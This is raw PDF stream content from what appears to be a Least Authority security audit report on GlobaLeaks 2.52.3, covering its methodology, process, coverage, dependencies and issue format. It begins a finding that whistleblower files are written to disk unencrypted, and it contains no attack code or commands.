BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Methodology and Disclosure) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 510.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .52748 Tw (Our audit techniques included manual code analysis, user interface interaction, and whitebox penetration) Tj T* 0 Tw 3.646651 Tw (testing. After delivering this report to the development team, we continue to work with them on) Tj T* 0 Tw (remediations.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 468.0236 cm
q
BT 1 0 0 1 0 26 Tm 2.793516 Tw 12 TL /F1 10 Tf 0 0 0 rg (We promote a very transparent process, and all of our findings will find their way onto the public) Tj T* 0 Tw .114147 Tw 0 0 .501961 rg (GlobaLeaks Issue Tracker) Tj 0 0 0 rg (, once we believe sufficient remediation protects existing users. Additionally, we) Tj T* 0 Tw (will collaborate with that team to publish this report.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 468.0236 cm
Q
 
endstream
endobj
% 'R346': class PDFStream 
346 0 obj
% page stream
<< /Length 7928 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 744.0236 cm
q
BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Process) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 726.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (The process ) Tj /F4 10 Tf (Least Authority ) Tj /F1 10 Tf (uses for security audits follows these phases:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 720.0236 cm
Q
q
1 0 0 1 62.69291 720.0236 cm
Q
q
1 0 0 1 62.69291 666.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 39 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (1.) Tj T* -5.66 0 Td ET
Q
Q
q
1 0 0 1 23 39 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Project Discovery and Developer Interviews) Tj T* ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.55528 Tw (First, we look at the project's web site to get a high level understanding of what functionality the) Tj T* 0 Tw 1.075984 Tw (software under review provides. We then meet with with the developers to gain an appreciation of) Tj T* 0 Tw (their vision of the software.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 660.0236 cm
Q
q
1 0 0 1 62.69291 618.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 27 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (2.) Tj T* -5.66 0 Td ET
Q
Q
q
1 0 0 1 23 27 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Familiarization and Exploration) Tj T* ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.779318 Tw (In this phase we install and use the relevant software, exploring the user interactions and roles.) Tj T* 0 Tw (While we do this, we brainstorm threat models and attack surfaces.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 612.0236 cm
Q
q
1 0 0 1 62.69291 558.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 39 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (3.) Tj T* -5.66 0 Td ET
Q
Q
q
1 0 0 1 23 39 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Background Research) Tj T* ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.755366 Tw (After our initial exploration, we read design documentation, review other audit results, search for) Tj T* 0 Tw 3.692706 Tw (similar projects, examine source code dependencies, skim open issue tickets, and generally) Tj T* 0 Tw (investigate details other than the implementation.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 552.0236 cm
Q
q
1 0 0 1 62.69291 510.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 27 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (4.) Tj T* -5.66 0 Td ET
Q
Q
q
1 0 0 1 23 27 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Design and Implementation Investigation) Tj T* ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm 1.589269 Tw 12 TL /F1 10 Tf 0 0 0 rg (In this phase we hypothesize what vulnerabilities may be present, creating ) Tj /F4 10 Tf (Issue ) Tj /F1 10 Tf (entries, and for) Tj T* 0 Tw (each we follow the following ) Tj 0 0 .501961 rg (Issue Investigation and Remediation ) Tj 0 0 0 rg (process.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 504.0236 cm
Q
q
1 0 0 1 62.69291 414.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 75 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (5.) Tj T* -5.66 0 Td ET
Q
Q
q
1 0 0 1 23 75 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Report Delivery) Tj T* ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 62 Tm 1.63436 Tw 12 TL /F1 10 Tf 0 0 0 rg (At this point in our schedule, we wrap up our investigative work. Any unresolved issues or open) Tj T* 0 Tw 1.152126 Tw (questions remain documented in the report. After delivering a report to the development team, ) Tj /F4 10 Tf (we) Tj T* 0 Tw 4.620751 Tw (refrain from editing ) Tj /F1 10 Tf (the report, even when there are factual errors, misspellings, or other) Tj T* 0 Tw .299213 Tw (embarrassments. Instead, we document those changes after the fact either in an ) Tj /F4 10 Tf (Addendum Report) Tj /F1 10 Tf (,) Tj T* 0 Tw 2.955366 Tw (or more typically in project specific development issue tracking tickets specific to the security) Tj T* 0 Tw (findings.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 408.0236 cm
Q
q
1 0 0 1 62.69291 342.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 51 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (6.) Tj T* -5.66 0 Td ET
Q
Q
q
1 0 0 1 23 51 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Remediation) Tj T* ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 38 Tm /F1 10 Tf 12 TL 2.45748 Tw (During this phase we collaborate with the developers to implement appropriate mitigations and) Tj T* 0 Tw .59186 Tw (remediations. It may be the case that the actual mitigations or remediations do not follow our report) Tj T* 0 Tw .275814 Tw (recommendations, due to the nature of design, code, operational deployment, and other engineering) Tj T* 0 Tw (changes, as well as mistakes or misunderstandings.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 336.0236 cm
Q
q
1 0 0 1 62.69291 294.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 27 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (7.) Tj T* -5.66 0 Td ET
Q
Q
q
1 0 0 1 23 27 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Publication) Tj T* ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.590697 Tw (Only after we agree with the development team that all vulnerabilities with sufficient impact have) Tj T* 0 Tw (been appropriately mitigated do we publish our results.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 294.0236 cm
Q
q
1 0 0 1 62.69291 264.0236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Issue Investigation and Remediation) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 210.0236 cm
q
BT 1 0 0 1 0 38 Tm .391647 Tw 12 TL /F1 10 Tf 0 0 0 rg (The auditors follow a ) Tj /F4 10 Tf (conservative) Tj /F1 10 Tf (, ) Tj /F4 10 Tf (transparent ) Tj /F1 10 Tf (process for analyzing potential security vulnerabilities and) Tj T* 0 Tw 1.040814 Tw (seeing them through successful remediation. Whenever a potential issue is discovered, we immediately) Tj T* 0 Tw 1.678876 Tw (create an ) Tj /F4 10 Tf (Issue ) Tj /F1 10 Tf (entry for it in this document, even though we have not yet verified the feasibility and) Tj T* 0 Tw (impact of the issue.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 144.0236 cm
q
BT 1 0 0 1 0 50 Tm .88436 Tw 12 TL /F1 10 Tf 0 0 0 rg (This process is conservative because we document our suspicions early even if they are later shown to) Tj T* 0 Tw 2.851797 Tw (not represent exploitable vulnerabilities. The process is transparent because we share intermediate) Tj T* 0 Tw 1.684983 Tw (revisions of this document directly with ) Tj /F4 10 Tf (GlobaLeaks) Tj /F1 10 Tf (, regardless of the state of polish. Additionally, we) Tj T* 0 Tw .849269 Tw (attempt to communicate our evolving understanding and refinement of an issue through the ) Tj /F2 10 Tf (Status ) Tj /F1 10 Tf (field) Tj T* 0 Tw (\(see ) Tj 0 0 .501961 rg (Issue Format ) Tj 0 0 0 rg (next\).) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 78.02362 cm
q
BT 1 0 0 1 0 50 Tm .216412 Tw 12 TL /F1 10 Tf 0 0 0 rg (We generally follow a process of first documenting the suspicion with unresolved questions, then ) Tj /F4 10 Tf (verifying ) Tj T* 0 Tw 1.962126 Tw /F1 10 Tf (the issue through code analysis, live experimentation, or automated tests. Code analysis is the most ) Tj T* 0 Tw .889983 Tw (tentative verification, and we strive to provide test code, log captures, or screenshots demonstrating our ) Tj T* 0 Tw .014987 Tw (verification. After this we analyze the feasibility of an attack in a live system. Next we search for immediate ) Tj T* 0 Tw 2.583828 Tw /F4 10 Tf (mitigations ) Tj /F1 10 Tf (that live deployments can take, and finally we suggest the requirements for ) Tj /F4 10 Tf (remediation) Tj T* 0 Tw ET
Q
Q
 
endstream
endobj
% 'R347': class PDFStream 
347 0 obj
% page stream
<< /Length 620 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 753.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (engineering for future releases.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 711.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 4.770888 Tw (The mitigation and remediation recommendations should be scrutinized by the developers and) Tj T* 0 Tw 1.890888 Tw (deployment engineers, and successful mitigation and remediation is an ongoing collaborative process) Tj T* 0 Tw (after we deliver our report, and before the details are made public.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 711.0236 cm
Q
 
endstream
endobj
% 'R348': class PDFStream 
348 0 obj
% page stream
<< /Length 6397 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 744.0236 cm
q
BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Coverage) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 702.0236 cm
q
BT 1 0 0 1 0 26 Tm 2.37998 Tw 12 TL /F1 10 Tf 0 0 0 rg (Our coverage focused on user interface and usability exploration, then ) Tj /F4 10 Tf (GLBackend ) Tj /F1 10 Tf (code, examining) Tj T* 0 Tw 4.970976 Tw (exception handling, concurrency issues, entropy API usage, cross-site request forgery, session) Tj T* 0 Tw (management, logging, side channels, and persistent storage.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 672.0236 cm
q
BT 1 0 0 1 0 14 Tm .090651 Tw 12 TL /F1 10 Tf 0 0 0 rg (We also examined the client codebase to perform some basic XSS testing, examined clock skew between) Tj T* 0 Tw (client and server, and studied the ) Tj 0 0 .501961 rg (Angular ) Tj 0 0 0 rg (templating system.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 654.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Our depth of coverage of these areas is modest to moderate.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 636.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (A detailed log of our investigations is in ) Tj 0 0 .501961 rg (Appendix A. Work Log) Tj 0 0 0 rg (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 606.0236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Target Code) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 579.0236 cm
q
BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Revision) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 549.0236 cm
q
BT 1 0 0 1 0 14 Tm 2.326136 Tw 12 TL /F1 10 Tf 0 0 0 rg (This audit targets the ) Tj 0 0 .501961 rg (GLBackend 2.52.3 ) Tj 0 0 0 rg (and ) Tj 0 0 .501961 rg (GLClient 2.52.3 ) Tj 0 0 0 rg (release revisions, which comprise the) Tj T* 0 Tw (server and browser-client components of GlobaLeaks.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 522.0236 cm
q
BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Dependencies) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 492.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.245697 Tw (Although our primary focus was on the application code, we examined dependency code and behavior) Tj T* 0 Tw (where relevant to a particular line of investigation.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 474.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F4 10 Tf (GLBackend ) Tj /F1 10 Tf (dependencies are:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 458.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F5 10 Tf 12 TL (Twisted) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 443.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 0 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (An asynchronous I/O and scheduling framework.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 427.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F5 10 Tf 12 TL (apscheduler) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 412.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 0 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Advanced Python Scheduler. A task scheduling library.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 396.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F5 10 Tf 12 TL (zope.component) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 381.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 0 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (This is not imported in the source code.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 365.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F5 10 Tf 12 TL (zope.interface) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 350.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 0 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (An abstraction framework for Python, used by ) Tj /F4 10 Tf (Twisted) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 334.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F5 10 Tf 12 TL (cyclone) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 319.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 0 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (A web application framework for ) Tj /F4 10 Tf (Twisted) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 303.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F5 10 Tf 12 TL (Storm) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 288.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 0 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (An Object-Relational Model \(ORM\).) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 272.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F5 10 Tf 12 TL (transaction) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 257.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 0 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (A transaction management library.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 241.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F5 10 Tf 12 TL (txsocksx) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 226.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 0 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (A ) Tj /F3 10 Tf (SOCKS ) Tj /F1 10 Tf (protocol implementation for ) Tj /F4 10 Tf (Twisted) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 210.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F5 10 Tf 12 TL (pycrypto) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 195.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 0 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (A cryptographic library.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 179.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F5 10 Tf 12 TL (scrypt) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 164.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 0 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (An implementation of the ) Tj /F3 10 Tf (scrypt ) Tj /F1 10 Tf (password hashing algorithm.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 148.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F5 10 Tf 12 TL (python_gnupg) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 133.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 0 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (A wrapper around the ) Tj /F4 10 Tf (GnuPG ) Tj /F1 10 Tf (encryption tool.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 103.0236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Target Configuration) Tj T* ET
Q
Q
 
endstream
endobj
% 'R349': class PDFStream 
349 0 obj
% page stream
<< /Length 475 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 729.0236 cm
q
BT 1 0 0 1 0 26 Tm 2.28998 Tw 12 TL /F1 10 Tf 0 0 0 rg (We analyzed a configuration with all-default settings, except sometimes disabling the requirement to) Tj T* 0 Tw 1.889318 Tw (access the backend over ) Tj /F4 10 Tf (Tor) Tj /F1 10 Tf (. The backend was installed in each auditor's Ubuntu system, usually a) Tj T* 0 Tw (virtual machine.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 729.0236 cm
Q
 
endstream
endobj
% 'R350': class PDFStream 
350 0 obj
% page stream
<< /Length 5918 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 744.0236 cm
q
BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Findings) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 714.0236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Vulnerabilities) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 684.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 2.916412 Tw (This section describes security vulnerabilities. We err on the side of caution by including potential) Tj T* 0 Tw (vulnerabilities, even if they are currently not exploitable, or if their impact is unknown.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 654.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 2.107045 Tw (The issues are documented in the order of discovery. We do not attempt to prioritize by severity or) Tj T* 0 Tw (mitigation needs. Instead we work with the development team to help them make those decisions wisely.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 627.0236 cm
q
BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue Format) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 609.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (All ) Tj /F4 10 Tf (Issues ) Tj /F1 10 Tf (represent ) Tj /F4 10 Tf (potential ) Tj /F1 10 Tf (security vulnerabilities and have these fields:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 591.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (The date when ) Tj /F4 10 Tf (Least Authority ) Tj /F1 10 Tf (first notified the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (team about the finding.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 561.0236 cm
q
BT 1 0 0 1 0 14 Tm 2.970751 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (A concise description of the ) Tj /F4 10 Tf (essential ) Tj /F1 10 Tf (vulnerability. Note, we explicitly strive to exclude) Tj T* 0 Tw (conflating issues, such as when other components or aspects of the system may mitigate the vulnerability.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 507.0236 cm
q
BT 1 0 0 1 0 38 Tm .188735 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (We describe what benefit an attacker gains from leveraging the attack. Note, we attempt to make) Tj T* 0 Tw .988651 Tw (this assertion conservatively, and this does not include a "real life impact analysis" such as determining) Tj T* 0 Tw 1.37332 Tw (how many existing users could be compromised by a live attack. For example, the impact of a flaw in) Tj T* 0 Tw (authentication may be that an attacker may authenticate as any user within a class of users.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 453.0236 cm
q
BT 1 0 0 1 0 38 Tm 1.44784 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (Here we describe what resources are necessary to execute the attack, which can) Tj T* 0 Tw 1.456647 Tw (help reason about mitigation priorities. For example, an authentication vulnerability may require finding) Tj T* 0 Tw .49061 Tw /F3 10 Tf (MD5 ) Tj /F1 10 Tf (collisions in passwords, or it may require only a ) Tj /F4 10 Tf (Cross-Site Reference Forgery) Tj /F1 10 Tf (, and these two cases) Tj T* 0 Tw (involve qualitatively different attacker resources.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 399.0236 cm
q
BT 1 0 0 1 0 38 Tm .830514 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (The feasibility of an attack is a ) Tj /F4 10 Tf (tentative ) Tj /F1 10 Tf (educated guess as to how difficult it may be for an) Tj T* 0 Tw 1.92284 Tw (attacker to acquire the necessary attack resources above. For example, we would assume an attack) Tj T* 0 Tw 2.910697 Tw (which relies on ) Tj /F3 10 Tf (MD5 ) Tj /F1 10 Tf (collisions is qualitatively more expensive and less feasible than a ) Tj /F4 10 Tf (Cross-Site) Tj T* 0 Tw (Reference Forgery) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 357.0236 cm
q
BT 1 0 0 1 0 26 Tm .891412 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Here we describe our method of verifying the vulnerability, and also demonstrations of the) Tj T* 0 Tw 1.286412 Tw (vulnerability, such as code snippets or screenshots. If an ) Tj /F4 10 Tf (Issue ) Tj /F1 10 Tf (is judged unexploitable, the verification) Tj T* 0 Tw (section becomes especially important, because mistakes in verification may mask exploitability.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 327.0236 cm
q
BT 1 0 0 1 0 14 Tm 3.12498 Tw 12 TL /F2 10 Tf 0 0 0 rg (Vulnerability Description: ) Tj /F1 10 Tf (In this section we describe the implementation details and the specific) Tj T* 0 Tw (process necessary to perform an attack.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 285.0236 cm
q
BT 1 0 0 1 0 26 Tm .020697 Tw 12 TL /F2 10 Tf 0 0 0 rg (Mitigation: ) Tj /F1 10 Tf (The mitigation section focuses on what steps ) Tj /F4 10 Tf (current ) Tj /F1 10 Tf (users or operators may take immediately) Tj T* 0 Tw 2.778443 Tw (to protect themselves. It's important that the developers, users, and operators cautiously verify our) Tj T* 0 Tw (recommendations before implementing them.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 231.0236 cm
q
BT 1 0 0 1 0 38 Tm 1.917976 Tw 12 TL /F2 10 Tf 0 0 0 rg (Remediation: ) Tj /F1 10 Tf (The remediation recommendations recommend a development path which will prevent,) Tj T* 0 Tw 3.78229 Tw (detect, or otherwise mitigate the vulnerability in future releases. There may be multiple possible) Tj T* 0 Tw 1.046905 Tw (remediation strategies, so we try to make minimal recommendations and collaborate with developers to) Tj T* 0 Tw (arrive at the most pragmatic remediation.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 201.0236 cm
q
BT 1 0 0 1 0 14 Tm .274198 Tw 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (This field has a one sentence description of the state of an ) Tj /F4 10 Tf (Issue ) Tj /F1 10 Tf (at the time of report publication.) Tj T* 0 Tw (This is followed by a chronological log of refinements to the ) Tj /F4 10 Tf (Issue ) Tj /F1 10 Tf (entry which occurred during the audit.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 201.0236 cm
Q
 
endstream
endobj
% 'R351': class PDFStream 
351 0 obj
% page stream
<< /Length 4986 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 750.0236 cm
q
BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue A. Plaintext is Written to Disk Before Encryption) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 732.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-01-30) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 702.0236 cm
q
BT 1 0 0 1 0 14 Tm .915697 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (The files whistleblowers submit are written to disk before being encrypted with the receiver's) Tj T* 0 Tw (public key.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 684.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (Forensic analysis of the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node's hard drive could reveal the contents of past leaks.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 666.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (The attacker needs block-level access to the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node's disk.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 624.0236 cm
q
